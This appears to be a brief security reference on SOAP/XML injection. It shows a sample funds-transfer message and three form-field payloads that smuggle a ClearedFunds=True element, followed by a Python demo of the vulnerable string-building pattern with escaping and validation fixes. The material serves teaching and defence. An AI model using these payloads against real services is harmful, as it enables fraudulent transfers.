SOAP

Example SOAP:

<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope">
  <soap:Body>
    <pre:Add xmlns:pre="http://target/lists" soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
      <Account>
        <FromAccount>18281008</FromAccount>
        <Amount>1430</Amount>
        <ClearedFunds>False</ClearedFunds>
        <ToAccount>08447656</ToAccount>
      </Account>
    </pre:Add>
  </soap:Body>
</soap:Envelope>

Example Injections:

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430&ToAccount=08447656&Submit=Submit

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount><!--&ToAccount=-->08447656&Submit=Submit

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount>08447656</ToAccount></Account></pre:Add></soap:Body></soap:Envelope><!--&Submit=Submit
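
Why the first injection string above changes the message, and what stops it, as an added example that is not code from the original page. It assumes a back end that builds the SOAP request by string formatting; the function names, the trimmed template and the digits-only validation rule are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Template modelled on the page's SOAP example (encodingStyle attribute omitted).
TEMPLATE = (
    '<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope">'
    '<soap:Body><pre:Add xmlns:pre="http://target/lists"><Account>'
    "<FromAccount>{FromAccount}</FromAccount>"
    "<Amount>{Amount}</Amount>"
    "<ClearedFunds>False</ClearedFunds>"
    "<ToAccount>{ToAccount}</ToAccount>"
    "</Account></pre:Add></soap:Body></soap:Envelope>"
)
FIELDS = ("FromAccount", "Amount", "ToAccount")

# Form values taken from the page's first injection string.
INJECTED = {
    "FromAccount": "18281008",
    "Amount": "1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430",
    "ToAccount": "08447656",
}

def build_unsafe(form):
    """Vulnerable pattern: raw form values are pasted into the XML text."""
    return TEMPLATE.format(**{f: form[f] for f in FIELDS})

def build_escaped(form):
    """Mitigation 1: escape &, < and > so values stay character data."""
    return TEMPLATE.format(**{f: escape(form[f]) for f in FIELDS})

def validate(form):
    """Mitigation 2 (assumed rule): every field must be 1-12 ASCII digits."""
    for f in FIELDS:
        if not re.fullmatch(r"[0-9]{1,12}", form[f]):
            raise ValueError(f"rejected {f}: not a plain number")
    return True

def cleared_funds(xml_text):
    """Return the text of every <ClearedFunds> element the parser sees."""
    return [e.text for e in ET.fromstring(xml_text).iter("ClearedFunds")]

if __name__ == "__main__":
    print(cleared_funds(build_unsafe(INJECTED)))   # injected element comes first
    print(cleared_funds(build_escaped(INJECTED)))  # only the server's own value
```

The unescaped message stays well-formed but carries two ClearedFunds elements, so a consumer that reads the first match sees the injected value; duplicate or unexpected elements in a logged request are a useful detection signal.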

Signature Wrapping

DoS

Redirect Reference

WS-Addressing spoofing